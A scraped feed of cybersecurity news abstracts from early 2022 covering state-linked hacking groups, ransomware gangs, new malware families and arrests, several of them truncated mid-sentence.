Facebook/Meta said Russia-linked threat actors are attempting to use the social network against Ukraine with hate speech, bullying, and fake news. Facebook/Meta revealed that Russia-linked threat actors are attempting to weaponize the social network...Security Affairs
April 9, 2022
China-linked threat actors target Indian Power Grid organizations Full Text
Abstract
China-linked threat actors continue to target Indian power grid organizations, most of the attacks involved the ShadowPad backdoor. Recorded Future's Insikt Group researchers uncovered a campaign conducted by a China-linked threat actor targeting...Security Affairs
April 08, 2022
Chinese Hacker Groups Continue to Target Indian Power Grid Assets Full Text
Abstract
China-linked adversaries have been attributed to an ongoing onslaught against Indian power grid organizations, one year after a concerted campaign targeting critical infrastructure in the country came to light. Most of the intrusions involved a modular backdoor named ShadowPad , according to Recorded Future's Insikt Group, a sophisticated remote access trojan which has been dubbed a "masterpiece of privately sold malware in Chinese espionage." "ShadowPad continues to be employed by an ever-increasing number of People's Liberation Army (PLA) and Ministry of State Security (MSS)-linked groups, with its origins linked to known MSS contractors first using the tool in their own operations and later likely acting as a digital quartermaster," the researchers said . The goal of the sustained campaign, the cybersecurity company said, is to facilitate intelligence gathering pertaining to critical infrastructure systems in preparation for future contingencyThe Hacker News
April 8, 2022
FIN7 Forays into Ransomware Attack Landscape with New Tools Full Text
Abstract
Mandiant warned against the evil ambitions of the FIN7 group, which has shown strong signs of entering ransomware operations. The group’s presence has been reported before attack events from Maze, Darkside, BlackCat, and Ryuk. Recently, it has been observed showing off a novel backdoor and new mali ... Read MoreCyware Alerts - Hacker News
April 7, 2022
Deep Panda Uses Fire Chili Windows Rootkit Full Text
Abstract
Deep Panda was found exploiting Log4Shell to deploy the new Fire Chili rootkit in compromised networks of organizations in the travel, finance, and cosmetic industries. Fire Chili helps keep file operations, registry key additions, processes, and malicious network connections concealed from the us ... Read MoreCyware Alerts - Hacker News
April 7, 2022
A Bad Luck BlackCat Full Text
Abstract
Kaspersky claims that at least some members of the new BlackCat group have links to the BlackMatter group, because they modified and reused a custom exfiltration tool we call Fendr and which has only been observed in BlackMatter activity.Securelist
April 05, 2022
FIN7 Hackers Leveraging Password Reuse and Software Supply Chain Attacks Full Text
Abstract
The notorious cybercrime group known as FIN7 has diversified its initial access vectors to incorporate software supply chain compromise and the use of stolen credentials, new research has revealed. "Data theft extortion or ransomware deployment following FIN7-attributed activity at multiple organizations, as well as technical overlaps, suggests that FIN7 actors have been associated with various ransomware operations over time," incident response firm Mandiant said in a Monday analysis. The cybercriminal group, since its emergence in the mid-2010s, has gained notoriety for large-scale malware campaigns targeting the point-of-sale (POS) systems aimed at restaurant, gambling, and hospitality industries with credit card-stealing malware. FIN7's shift in monetization strategy towards ransomware follows an October 2021 report from Recorded Future's Gemini Advisory unit, which found the adversary setting up a fake front company named Bastion Secure to recruit unwittThe Hacker News
April 05, 2022
Chinese hackers abuse VLC Media Player to launch malware loader Full Text
Abstract
Security researchers have uncovered a long-running malicious campaign from hackers associated with the Chinese government who are using VLC Media Player to launch a custom malware loader.BleepingComputer
April 04, 2022
Multiple Hacker Groups Capitalizing on Ukraine Conflict for Distributing Malware Full Text
Abstract
At least three different advanced persistent threat (APT) groups from across the world have launched spear-phishing campaigns in mid-March 2022 using the ongoing Russo-Ukrainian war as a lure to distribute malware and steal sensitive information. The campaigns, undertaken by El Machete, Lyceum, and SideWinder, have targeted a variety of sectors, including energy, financial, and governmental sectors in Nicaragua, Venezuela, Israel, Saudi Arabia, and Pakistan. "The attackers use decoys ranging from official-looking documents to news articles or even job postings, depending on the targets and region," Check Point Research said in a report. "Many of these lure documents utilize malicious macros or template injection to gain an initial foothold into the targeted organizations, and then launch malware attacks." The infection chains of El Machete , a Spanish-speaking threat actor first documented in August 2014 by Kaspersky, involve the use of macro-laced decoy docThe Hacker News
April 04, 2022
FIN7 hackers evolve toolset, work with multiple ransomware gangs Full Text
Abstract
Threat analysts have compiled a detailed technical report on FIN7 operations from late 2021 to early 2022, showing that the actor is still very active, evolving, and trying new monetization methods.BleepingComputer
April 01, 2022
British Police Charge Two Teenagers Linked to LAPSUS$ Hacker Group Full Text
Abstract
The City of London Police on Friday disclosed that it has charged two of the seven teenagers, a 16-year-old and a 17-year-old, who were arrested last week for their alleged connections to the LAPSUS$ data extortion gang. "Both teenagers have been charged with: three counts of unauthorized access to a computer with intent to impair the reliability of data; one count of fraud by false representation and one count of unauthorized access to a computer with intent to hinder access to data," Detective Inspector Michael O'Sullivan, from the City of London Police, said in a statement. In addition, the unnamed 16-year-old minor has been charged with one count of causing a computer to perform a function to secure unauthorized access to a program. The charges come as the City of London Police moved to arrest seven suspected LAPSUS$ gang members aged between 16 and 21 on March 25, with the agency telling The Hacker News that all the individuals had been subsequently "reThe Hacker News
April 01, 2022
North Korean Hackers Distributing Trojanized DeFi Wallet Apps to Steal Victims’ Crypto Full Text
Abstract
The North Korean state-backed hacking crew, otherwise known as the Lazarus Group , has been attributed to yet another financially motivated campaign that leverages a trojanized decentralized finance (DeFi) wallet app to distribute a fully-featured backdoor onto compromised Windows systems. The app, which is equipped with functionalities to save and manage a cryptocurrency wallet, is also designed to trigger the launch of the implant that can take control of the infected host. Russian cybersecurity firm Kaspersky said it first encountered the rogue application in mid-December 2021. The infection scheme initiated by the app also results in the deployment of the installer for a legitimate application, which gets overwritten with a trojanized version in an effort to cover its tracks. That said, the initial access avenue is unclear, although it's suspected to be a case of social engineering. The spawned malware, which masquerades as Google's Chrome web browser, subsequentlyThe Hacker News
March 31, 2022
Chinese hacking group uses new ‘Fire Chili’ Windows rootkit Full Text
Abstract
The Chinese APT group known as Deep Panda has been spotted in a recent campaign targeting VMware Horizon servers with the Log4Shell exploit to deploy a novel rootkit named 'Fire Chili'.BleepingComputer
March 29, 2022
Hackers Gaining Power of Subpoena Via Fake “Emergency Data Requests” – Krebs on Security Full Text
Abstract
There is a terrifying and highly effective “method” that criminal hackers are now using to harvest sensitive customer data from Internet service providers, phone companies, and social media firms.Krebs on Security
March 26, 2022
Another Chinese Hacking Group Spotted Targeting Ukraine Amid Russia Invasion Full Text
Abstract
A Chinese-speaking threat actor called Scarab has been linked to a custom backdoor dubbed HeaderTip as part of a campaign targeting Ukraine since Russia embarked on an invasion last month, making it the second China-based hacking group after Mustang Panda to capitalize on the conflict. "The malicious activity represents one of the first public examples of a Chinese threat actor targeting Ukraine since the invasion began," SentinelOne researcher Tom Hegel said in a report published this week. SentinelOne's analysis follows an advisory from Ukraine's Computer Emergency Response Team (CERT-UA) earlier this week outlining a spear-phishing campaign that leads to the delivery of a RAR archive file, which comes with an executable that's designed to open a decoy file while stealthily dropping a malicious DLL called HeaderTip in the background. Scarab was first documented by the Symantec Threat Hunter Team, part of Broadcom Software, in January 2015, when iThe Hacker News
March 24, 2022
North Korean Hackers Exploited Chrome Zero-Day to Target Fintech, IT, and Media Firms Full Text
Abstract
Google's Threat Analysis Group (TAG) on Thursday disclosed that it acted to mitigate threats from two distinct government-backed attacker groups based in North Korea that exploited a recently-uncovered remote code execution flaw in the Chrome web browser. The campaigns, once again "reflective of the regime's immediate concerns and priorities," are said to have targeted U.S. based organizations spanning news media, IT, cryptocurrency, and fintech industries, with one set of the activities sharing direct infrastructure overlaps with previous attacks aimed at security researchers last year. The shortcoming in question is CVE-2022-0609 , a use-after-free vulnerability in the browser's Animation component that Google addressed as part of updates (version 98.0.4758.102) issued on February 14, 2022. It's also the first zero-day flaw patched by the tech giant since the start of 2022. "The earliest evidence we have of this exploit kit being actively deployThe Hacker News
March 24, 2022
Experts explained how to hack a building controller widely adopted in Russia Full Text
Abstract
A researcher discovered critical flaws that can be exploited by remote attackers to hack a building controller popular in Russia. A researcher has identified critical vulnerabilities that can allegedly be exploited to remotely hack a building controller...Security Affairs
March 24, 2022
Anonymous targets western companies still active in Russia, including Auchan, Leroy Merlin e Decathlon Full Text
Abstract
Anonymous launches its offensive against Wester companies still operating in Russia, it 'DDoSed' Auchan, Leroy Merlin e Decathlon websites. Since the start of the Russian invasion of Ukraine on February 24, Anonymous has declared war on Russia and...Security Affairs
March 24, 2022
North Korean hackers exploit Chrome zero-day weeks before patch Full Text
Abstract
North Korean state hackers have exploited a zero-day, remote code execution vulnerability in Google Chrome web browser for more than a month before a patch became available, in attacks targeting news media, IT companies, cryptocurrency and fintech organizations.BleepingComputer
March 23, 2022
Chinese ‘Mustang Panda’ Hackers Spotted Deploying New ‘Hodur’ Malware Full Text
Abstract
A China-based advanced persistent threat (APT) known as Mustang Panda has been linked to an ongoing cyberespionage campaign using a previously undocumented variant of the PlugX remote access trojan on infected machines. Slovak cybersecurity firm ESET dubbed the new version Hodur , owing to its resemblance to another PlugX (aka Korplug) variant called THOR that came to light in July 2021. "Most victims are located in East and Southeast Asia, but a few are in Europe (Greece, Cyprus, Russia) and Africa (South Africa, South Sudan)," ESET malware researcher Alexandre Côté Cyr said in a report shared with The Hacker News. "Known victims include research entities, internet service providers (ISPs), and European diplomatic missions mostly located in East and Southeast Asia." Mustang Panda, also known as TA416, HoneyMyte, RedDelta, or PKPLUG, is a cyber espionage group that's primarily known for targeting non-governmental organizations with a specific focuThe Hacker News
March 23, 2022
Hackers steal from hackers by pushing fake malware on forums Full Text
Abstract
Security analysts from two companies have spotted a new case of hackers targeting hackers via clipboard stealers disguised as cracked RATs and malware building tools.BleepingComputer
March 23, 2022
Chinese Mustang Panda Hacker Group Spotted Deploying New Hodur Malware Full Text
Abstract
ESET researchers have discovered Hodur, a previously undocumented Korplug variant spread by Mustang Panda, that uses phishing lures referencing current events in Europe, including the invasion of Ukraine.ESET Security
March 21, 2022
Caketap Rootkit by UNC2891 Targets Banks Customers Full Text
Abstract
The LightBasin threat actor is using the new Unix rootkit Caketap against servers running Oracle Solaris. Caketap can hide network files, processes, and connections, and install hooks into system functions for remote commands and configurations. The group has mostly targeted Oracle Solaris-bas ... Read MoreCyware Alerts - Hacker News
March 21, 2022
South Korean DarkHotel Hackers Targeted Luxury Hotels in Macau Full Text
Abstract
Luxury hotels in the Chinese special administrative region of Macau were the target of a malicious spear-phishing campaign from the second half of November 2021 and through mid-January 2022. Cybersecurity firm Trellix attributed the campaign with moderate confidence to a suspected South Korean advanced persistent threat (APT) tracked as DarkHotel, building on research previously published by Zscaler in December 2021. Believed to be active since 2007, DarkHotel has a history of striking "senior business executives by uploading malicious code to their computers through infiltrated hotel Wi-Fi networks, as well as through spear-phishing and P2P attacks," Zscaler researchers Sahil Antil and Sudeep Singh said. Prominent sectors targeted include law enforcement, pharmaceuticals, and automotive manufacturers. The attack chains involved distributing email messages directed to individuals in executive roles in the hotel, such as the vice president of human resources, assistanThe Hacker News
March 19, 2022
Cyber Attackers Tap Cloud Native Technologies in Russia-Ukraine War Full Text
Abstract
Researchers at Aqua revealed trends by analyzing data from public repositories that contain code and tools used for the cyber-aggression on both sides of the Russia-Ukraine conflict.Security Boulevard
March 18, 2022
Caketap, a new Unix rootkit used to siphon ATM banking data Full Text
Abstract
Mandiant researchers discovered a new Unix rootkit named Caketap, which is used to steal ATM banking data while investigating the activity of the LightBasin cybercrime group (aka UNC1945).Security Affairs
March 17, 2022
New Unix rootkit used to steal ATM banking data Full Text
Abstract
Threat analysts following the activity of LightBasin, a financially motivated group of hackers, report the discovery of a previously unknown Unix rootkit that is used to steal ATM banking data and conduct fraudulent transactions.BleepingComputer
March 17, 2022
Anonymous continues to support Ukraine against the Russia Full Text
Abstract
The collective Anonymous and its affiliated groups continue to target the Russian government and private organizations. The collective Anonymous, and other groups in its ecosystem, continue to target the Russian government and private organizations. Let's...Security Affairs
March 17, 2022
BIG sabotage: Famous npm package deletes files to protest Ukraine war Full Text
Abstract
This week, the developer of the popular npm package 'node-ipc' released sabotaged versions of the library in protest of the ongoing Russo-Ukrainian War. The 'node-ipc' package, which gets downloaded over a million times weekly, began deleting files on developer's machines, in addition to creating new text files with "peace" messages.BleepingComputer
March 15, 2022
HackerOne apologizes to Ukrainian hackers for mistakenly blocking payouts Full Text
Abstract
Today, Chris Evans, the CISO of bug bounty platform HackerOne, apologized to Ukrainian hackers after erroneously blocking their bug bounty payouts following sanctions imposed on Russia and Belarus after Ukraine's invasion.BleepingComputer
March 10, 2022
Ukrainian Hacker Linked to REvil Ransomware Attacks Extradited to United States Full Text
Abstract
Yaroslav Vasinskyi , a Ukrainian national, linked to the Russia-based REvil ransomware group has been extradited to the U.S. to face charges for his role in carrying out the file-encrypting malware attacks against several companies, including Kaseya last July. The 22-year-old had been previously arrested in Poland in October 2021, prompting the U.S. Justice Department (DoJ) to file charges of conspiracy to commit fraud and related activity in connection with computers, damage to protected computers, and conspiracy to commit money laundering. Ransomware is the digital equivalent of extortion wherein cybercrime actors encrypt victims' data and take it hostage in return for a monetary payment to recover the data, failing which the stolen information is published online or sold to other third-parties. According to the DoJ, in addition to the headline-grabbing attacks on JBS and Kaseya, REvil is said to have propagated its infection to more than 175,000 computers, netting theThe Hacker News
March 09, 2022
Hackers fork open-source reverse tunneling tool for persistence Full Text
Abstract
Security experts have spotted an interesting case of a suspected ransomware attack that employed custom-made tools typically used by APT (advanced persistent threat) groups.BleepingComputer
March 08, 2022
Google: Russia, China, Belarus state hackers target Ukraine, Europe Full Text
Abstract
Google says Russian, Belarusian, and Chinese threat actors targeted Ukrainian and European government and military organizations, as well as individuals, in sweeping phishing campaigns and DDoS attacks.BleepingComputer
March 2, 2022
MuddyWater Rounds up its Arsenal with Multi-Malware Sets Full Text
Abstract
Cybersecurity agencies released a joint cybersecurity advisory detailing malicious cyber operations by MuddyWater, which has been targeting a wide range of government and private-sector organizations in Asia, Africa, Europe, and North America. Among others, the CISA recommends organizations to use ... Read MoreCyware Alerts - Hacker News
March 2, 2022
Iranian Hackers Introduce New Malware to Target Middle East Full Text
Abstract
Mandiant tracked cybercriminals collaborating under the moniker UNC3313 deploying two new targeted malware to claim victims in the middle east. The group moves quickly to gain remote access by using ScreenConnect to intrude systems within an hour of initial compromise. Furthermore, the security fir ... Read MoreCyware Alerts - Hacker News
February 28, 2022
Meta: Ukrainian officials, military targeted by Ghostwriter hackers Full Text
Abstract
Facebook (now known as Meta) says it took down accounts used by a Belarusian-linked hacking group (UNC1151 or Ghostwriter) to target Ukrainian officials and military personnel on its platform.BleepingComputer
February 25, 2022
Multiple Hacking Groups Targeting ICS/OT Systems Full Text
Abstract
A new report on industrial cybersecurity has revealed three new threat groups, besides LockBit 2.0 and Conti, that have been targeting the industrial sector. Experts spotted three new groups Petrovite, Kostovite, and Erythrite, that have been targeting ICS/OT systems. To protect from threats, ... Read MoreCyware Alerts - Hacker News
February 24, 2022
US and UK link new Cyclops Blink malware to Russian state hackers Full Text
Abstract
UK and US cybersecurity agencies linked Cyclops Blink malware to Russia's Sandworm APT US and UK cybersecurity and law enforcement agencies published a joint security advisory about a new malware, dubbed Cyclops Blink, that has been linked to the Russian-backed...Security Affairs
February 23, 2022
US, UK link new Cyclops Blink malware to Russian state hackers Full Text
Abstract
New malware dubbed Cyclops Blink has been linked to the Russian-backed Sandworm hacking group in a joint security advisory published today by US and UK cybersecurity and law enforcement agencies.BleepingComputer
February 21, 2022
Hackers Exploiting Infected Android Devices to Register Disposable Accounts Full Text
Abstract
An analysis of SMS phone-verified account (PVA) services has led to the discovery of a rogue platform built atop a botnet involving thousands of infected Android phones, once again underscoring the flaws with relying on SMS for account validation. SMS PVA services, since gaining prevalence in 2018, provide users with alternative mobile numbers that can be used to register for other online services and platforms, and help bypass SMS-based authentication and single sign-on (SSO) mechanisms put in place to verify new accounts. "This type of service can be used by malicious actors to register disposable accounts in bulk or create phone-verified accounts for conducting fraud and other criminal activities," Trend Micro researchers said in a report published last week. Telemetry data gathered by the company shows that most of the infections are located in Indonesia (47,357), followed by Russia (16,157), Thailand (11,196), India (8,109), and France (5,548), Peru (4,915), MorocThe Hacker News
February 20, 2022
ShadowPad Linked to Chinese MSS and PLA Full Text
Abstract
Hackers affiliated with the Chinese Ministry of State Security and the People's Liberation Army are increasingly deploying the ShadowPad advanced modular RAT against its targets. It can steal sensitive system information, interact with the file system and registry, and deploy new modules to propaga ... Read MoreCyware Alerts - Hacker News
February 17, 2022
TA2541: A Tale of New Mysterious Hackers Full Text
Abstract
Proofpoint discovered a new threat group, dubbed TA2541, targeting entities in the aviation, aerospace, transportation, defense, and manufacturing sectors, since at least 2017. The most delivered RAT in TA2541 campaigns include AsyncRAT, followed by Parallax, NetWire, and WSH RAT. The campaigns are ... Read MoreCyware Alerts - Hacker News
February 15, 2022
Unskilled hacker linked to years of attacks on aviation, transport sectors Full Text
Abstract
For years, a low-skilled attacker has been using off-the-shelf malware in malicious campaigns aimed at companies in the aviation sector as well as in other sensitive industries.BleepingComputer
February 15, 2022
Mysterious Hackers Targeting Aerospace and Defence Industries for Years Full Text
Abstract
Dubbed TA2541 and detailed by researchers at Proofpoint, the persistent hacker group has been active since 2017 and has compromised hundreds of firms across North America, Europe, and the Middle East.ZDNet
February 10, 2022
Hacking group ‘ModifiedElephant’ evaded discovery for a decade Full Text
Abstract
Threat analysts have linked a decade of activity to an APT (advanced persistent threat) actor called 'ModifiedElephant', who has managed to remain elusive to all threat intelligence firms since 2012.BleepingComputer
February 10, 2022
Charming Kitten Adds New Malware To Its Arsenal Full Text
Abstract
Charming Kitten, aka Phosphorous, has reportedly added a novel PowerShell-based implant called PowerLess Backdoor with fortifies the group's ability to bypass security products. The attacker's toolset comes with extremely modular, multi-staged malware that decrypts and deploys additional payloads. ... Read MoreCyware Alerts - Hacker News
February 08, 2022
Kimsuki hackers use commodity RATs with custom Gold Dragon malware Full Text
Abstract
South Korean researchers have spotted a new wave of activity from the Kimsuky hacking group, involving commodity open-source remote access tools dropped with their custom backdoor, Gold Dragon.BleepingComputer
February 04, 2022
Another Israeli Firm, QuaDream, Caught Weaponizing iPhone Bug for Spyware Full Text
Abstract
A now-patched security vulnerability in Apple iOS that was previously found to be exploited by Israeli company NSO Group was also separately weaponized by a different surveillance vendor named QuaDream to hack into the company's devices. The development was reported by Reuters , citing unnamed sources, noting that "the two rival businesses gained the same ability last year to remotely break into iPhones [and] compromise Apple phones without an owner needing to open a malicious link." The zero-click exploit in question is FORCEDENTRY , a flaw in iMessage that could be leveraged to circumvent iOS security protections and install spyware that allowed attackers to scoop up a wealth of information such as contacts, emails, files, messages, and photos, as well as access to the phone's camera and microphone. QuaDream's spyware, named REIGN , functions in a manner similar to NSO Group's Pegasus, granting its users full control of the device. Apple addressedThe Hacker News
February 04, 2022
Microsoft: Russian FSB hackers hitting Ukraine since October Full Text
Abstract
Microsoft said today that a Russian hacking group known as Gamaredon has been behind a streak of spear-phishing emails targeting Ukrainian entities and organizations related to Ukrainian affairs since October 2021.BleepingComputer
February 04, 2022
Russian Gamaredon Hackers Targeted ‘Western Government Entity’ in Ukraine Full Text
Abstract
The Russia-linked Gamaredon hacking group attempted to compromise an unnamed Western government entity operating in Ukraine last month amidst ongoing geopolitical tensions between the two countries. Palo Alto Networks' Unit 42 threat intelligence team, in a new report publicized on February 3, said that the phishing attack took place on January 19, adding it "mapped out three large clusters of their infrastructure used to support different phishing and malware purposes." The threat actor, also known as Shuckworm, Armageddon, or Primitive Bear, has historically focused its offensive cyber attacks against Ukrainian government officials and organizations since 2013. Last year, Ukraine disclosed the collective's ties to Russia's Federal Security Service (FSB). To carry out the phishing attack, the operators behind the campaign leveraged a job search and employment platform within the country as a conduit to upload their malware downloader in the form of a resThe Hacker News
February 3, 2022
Exclusive interview with the Powerful Greek Army (PGA) hacker group Full Text
Abstract
Six years ago the Powerful Greek Army (PGA) appeared in the threat landscape. After a long breach the hacker collective is back. I have interviewed them in exclusive ... enjoy it! Tell me about your hacker team, which is the motivation behind the attacks? We...Security Affairs
February 01, 2022
Hacker Group ‘Moses Staff’ Using New StrifeWater RAT in Ransomware Attacks Full Text
Abstract
A politically motivated hacker group tied to a series of espionage and sabotage attacks on Israeli entities in 2021 incorporated a previously undocumented remote access trojan (RAT) that masquerades as the Windows Calculator app as part of a conscious effort to stay under the radar. Cybersecurity company Cybereason, which has been tracking the operations of the Iranian actor known as Moses Staff, dubbed the malware " StrifeWater ." "The StrifeWater RAT appears to be used in the initial stage of the attack and this stealthy RAT has the ability to remove itself from the system to cover the Iranian group's tracks," Tom Fakterman, Cybereason security analyst, said in a report. "The RAT possesses other capabilities, such as command execution and screen capturing, as well as the ability to download additional extensions." Moses Staff came to light towards the end of last year when Check Point Research unmasked a series of attacks aimed at Israeli orThe Hacker News
February 01, 2022
Iranian Hackers Using New PowerShell Backdoor in Cyber Espionage Attacks Full Text
Abstract
An advanced persistent threat group with links to Iran has updated its malware toolset to include a novel PowerShell-based implant called PowerLess Backdoor , according to new research published by Cybereason. The Boston-headquartered cybersecurity company attributed the malware to a hacking group known as Charming Kitten (aka Phosphorous, APT35, or TA453 ), while also calling out the backdoor's evasive PowerShell execution. "The PowerShell code runs in the context of a .NET application, thus not launching 'powershell.exe' which enables it to evade security products," Daniel Frank, senior malware researcher at Cybereason, said . "The toolset analyzed includes extremely modular, multi-staged malware that decrypts and deploys additional payloads in several stages for the sake of both stealth and efficacy." The threat actor, which is active since at least 2017, has been behind a series of campaigns in recent years, including those wherein the adversaThe Hacker News
January 31, 2022
Expert earned $100,500 bounty to hack Apple MacBook webcam and microphone Full Text
Abstract
Apple paid +$100K bounty for a macOS series of flaws that can allow threat actors to take over the microphone and camera. Apple last year addressed multiple macOS vulnerabilities discovered by the security researcher Ryan Pickren in the Safari browser...Security Affairs
January 30, 2022
Researchers use GPU fingerprinting to track users online Full Text
Abstract
A team of researchers from French, Israeli, and Australian universities has explored the possibility of using people's GPUs to create unique fingerprints and use them for persistent web tracking.BleepingComputer
January 28, 2022
North Korean Hackers Using Windows Update Service to Infect PCs with Malware Full Text
Abstract
The notorious Lazarus Group actor has been observed mounting a new campaign that makes use of the Windows Update service to execute its malicious payload, expanding the arsenal of living-off-the-land (LotL) techniques leveraged by the APT group to further its objectives. The Lazarus Group, also known as APT38 , Hidden Cobra, Whois Hacking Team, and Zinc, is the moniker assigned to the North Korea-based nation-state hacking group that's been active since at least 2009. Last year, the threat actor was linked to an elaborate social engineering campaign targeting security researchers. The latest spear-phishing attacks, which Malwarebytes detected on January 18, originate from weaponized documents with job-themed lures impersonating the American global security and aerospace company Lockheed Martin. Opening the decoy Microsoft Word file triggers the execution of a malicious macro embedded within the document that, in turn, executes a Base64-decoded shellcode to inject a nuThe Hacker News
January 28, 2022
North Korean Hackers Return with Stealthier Variant of KONNI RAT Malware Full Text
Abstract
A cyberespionage group with ties to North Korea has resurfaced with a stealthier variant of its remote access trojan called Konni to attack political institutions located in Russia and South Korea. "The authors are constantly making code improvements," Malwarebytes researcher Roberto Santos said . "Their efforts are aimed at breaking the typical flow recorded by sandboxes and making detection harder, especially via regular signatures as critical parts of the executable are now encrypted." Most recent intrusions staged by the group, believed to be operating under the Kimsuky umbrella, involved targeting the Russian Federation's Ministry of Foreign Affairs (MID) with New Year lures to compromise Windows systems with malware. The infections, as with other attacks of this kind, starts with a malicious Microsoft Office document that, when opened, initiates a mult-stage process that involves several moving parts that help the attackers elevate privileges, evaThe Hacker News
January 28, 2022
Hackers are taking over CEO accounts with rogue OAuth apps Full Text
Abstract
Threat analysts have observed a new campaign named 'OiVaVoii', targeting company executives and general managers with malicious OAuth apps and custom phishing lures sent from hijacked Office 365 accounts.BleepingComputer
January 27, 2022
Lazarus hackers use Windows Update to deploy malware Full Text
Abstract
North Korean-backed hacking group Lazarus has added the Windows Update client to its list of living-off-the-land binaries (LoLBins) and is now actively using it to execute malicious code on Windows systems.BleepingComputer
January 26, 2022
Hackers Using New Evasive Technique to Deliver AsyncRAT Malware Full Text
Abstract
A new, sophisticated phishing attack has been observed delivering the AsyncRAT trojan as part of a malware campaign that's believed to have commenced in September 2021. "Through a simple email phishing tactic with an html attachment, threat attackers are delivering AsyncRAT (a remote access trojan) designed to remotely monitor and control its infected computers through a secure, encrypted connection," Michael Dereviashkin, security researcher at enterprise breach prevention firm Morphisec, said in a report. The intrusions commence with an email message containing an HTML attachment that's disguised as an order confirmation receipt (e.g., Receipt-The Hacker News
January 24, 2022
Hackers Creating Fraudulent Crypto Tokens as Part of ‘Rug Pull’ Scams Full Text
Abstract
Misconfigurations in smart contracts are being exploited by scammers to create malicious cryptocurrency tokens with the goal of stealing funds from unsuspecting users. The instances of token fraud in the wild include hiding 99% fee functions and concealing backdoor routines, researchers from Check Point said in a report shared with The Hacker News. Smart contracts are programs stored on the blockchain that are automatically executed when predetermined conditions are met according to the terms of a contract or an agreement. They allow trusted transactions and agreements to be carried out between anonymous parties without the need for a central authority. By examining the Solidity source code used for implementing smart contracts, the Israeli cybersecurity company found instances of hidden and hardcoded fees that can't be changed, while allowing malicious actors to exert control over "who is allowed to sell." In another instance, a legitimate contract calledThe Hacker News
January 23, 2022
Molerats cyberespionage group uses public cloud services as attack infrastructure Full Text
Abstract
Cyberespionage group Molerats has been observed abusing legitimate cloud services, like Google Drive and Dropbox as attack infrastructure. Zscaler ThreatLabz analyzed an active espionage campaign carried out by Molerats cyberespionage group (aka TA402,...Security Affairs
January 22, 2022
Molerats Hackers Hiding New Espionage Attacks Behind Public Cloud Infrastructure Full Text
Abstract
An active espionage campaign has been attributed to the threat actor known as Molerats that abuses legitimate cloud services like Google Drive and Dropbox to host malware payloads and for command-and-control and the exfiltration of data from targets across the Middle East. The cyber offensive is believed to have been underway since at least July 2021, according to cloud-based information security company Zscaler, continuing previous efforts by the hacking group to conduct reconnaissance on the target hosts and plunder sensitive information. Molerats , also tracked as TA402, Gaza Hackers Team, and Extreme Jackal, is an advanced persistent threat (APT) group that's largely focused on entities operating in the Middle East. Attack activity associated with the actor has leveraged geopolitical and military themes to entice users to open Microsoft Office attachments and click on malicious links. The latest campaign detailed by Zscaler is no different in that it makes use of decoThe Hacker News
January 21, 2022
Chinese Hackers Spotted Using New UEFI Firmware Implant in Targeted Attacks Full Text
Abstract
A previously undocumented firmware implant deployed to maintain stealthy persistence as part of a targeted espionage campaign has been linked to the Chinese-speaking Winnti advanced persistent threat group ( APT41 ). Kaspersky, which codenamed the rootkit MoonBounce , characterized the malware as the "most advanced UEFI firmware implant discovered in the wild to date," adding "the purpose of the implant is to facilitate the deployment of user-mode malware that stages execution of further payloads downloaded from the internet." Firmware-based rootkits, once a rarity in the threat landscape, are fast becoming lucrative tools among sophisticated actors to help achieve long standing foothold in a manner that's not only hard to detect, but also difficult to remove. The first firmware-level rootkit — dubbed LoJax — was discovered in the wild in 2018. Since then, three different instances of UEFI malware have been unearthed so far, including MosaicRegressoThe Hacker News
January 20, 2022
Attackers Exploit Corporate Infrastructure for Credentials on ICS Networks Full Text
Abstract
While the ever-evolving technological landscape has connected the IT and OT sides of the business, it has also left ICS networks exposed to threats impacting IT systems.Cyware Alerts - Hacker News
January 19, 2022
DoNot Hacking Team Targeting Government and Military Entities in South Asia Full Text
Abstract
A threat actor with potential links to an Indian cybersecurity company has been nothing if remarkably persistent in its attacks against military organizations based in South Asia, including Bangladesh, Nepal, and Sri Lanka, since at least September 2020 by deploying different variants of its bespoke malware framework. Slovak cybersecurity firm ESET attributed the highly targeted attack to a hacking group known as Donot Team . "Donot Team has been consistently targeting the same entities with waves of spear-phishing emails with malicious attachments every two to four months," researchers Facundo Muñoz and Matías Porolli said . Operating since at least 2016, Donot Team (also known as APT-C-35 and SectorE02) has been linked to a string of intrusions primarily targeting embassies, governments, and military entities in Bangladesh, Sri Lanka, Pakistan, and Nepal with Windows and Android malware. In October 2021, Amnesty International unearthed evidence tying the group'The Hacker News
January 19, 2022
Microsoft: Hackers Exploiting New SolarWinds Serv-U Bug Related to Log4j Attacks Full Text
Abstract
Microsoft on Wednesday disclosed details of a new security vulnerability in SolarWinds Serv-U software that it said was being weaponized by threat actors to propagate attacks leveraging the Log4j flaws to compromise targets. Tracked as CVE-2021-35247 (CVSS score: 5.3), the issue is an "input validation vulnerability that could allow attackers to build a query given some input and send that query over the network without sanitation," Microsoft Threat Intelligence Center (MSTIC) said . The flaw, which was discovered by security researcher Jonathan Bar Or, affects Serv-U versions 15.2.5 and prior, and has been addressed in Serv-U version 15.3. "The Serv-U web login screen to LDAP authentication was allowing characters that were not sufficiently sanitized," SolarWinds said in an advisory, adding it "updated the input mechanism to perform additional validation and sanitization." The IT management software maker also pointed out that "no downstreThe Hacker News
January 19, 2022
Russian Hackers Heavily Using Malicious Traffic Direction System to Distribute Malware Full Text
Abstract
Potential connections between a subscription-based crimeware-as-a-service (Caas) solution and a cracked copy of Cobalt Strike have been established in what the researchers suspect is being offered as a tool for its customers to stage post-exploitation activities. Prometheus , as the service is called, first came to light in August 2021 when cybersecurity company Group-IB disclosed details of malicious software distribution campaigns undertaken by cybercriminal groups to distribute Campo Loader, Hancitor, IcedID, QBot, Buer Loader, and SocGholish in Belgium and the U.S. Costing $250 a month, it's marketed on Russian underground forums as a traffic direction system (TDS) to enable phishing redirection on a mass scale to rogue landing pages that are designed to deploy malware payloads on the targeted systems. "Prometheus can be considered a full-bodied service/platform that allows threat groups to purvey their malware or phishing operations with ease," BlackBerry ResearThe Hacker News
January 19, 2022
FIN8 Hackers Spotted Using New ‘White Rabbit’ Ransomware in Recent Attacks Full Text
Abstract
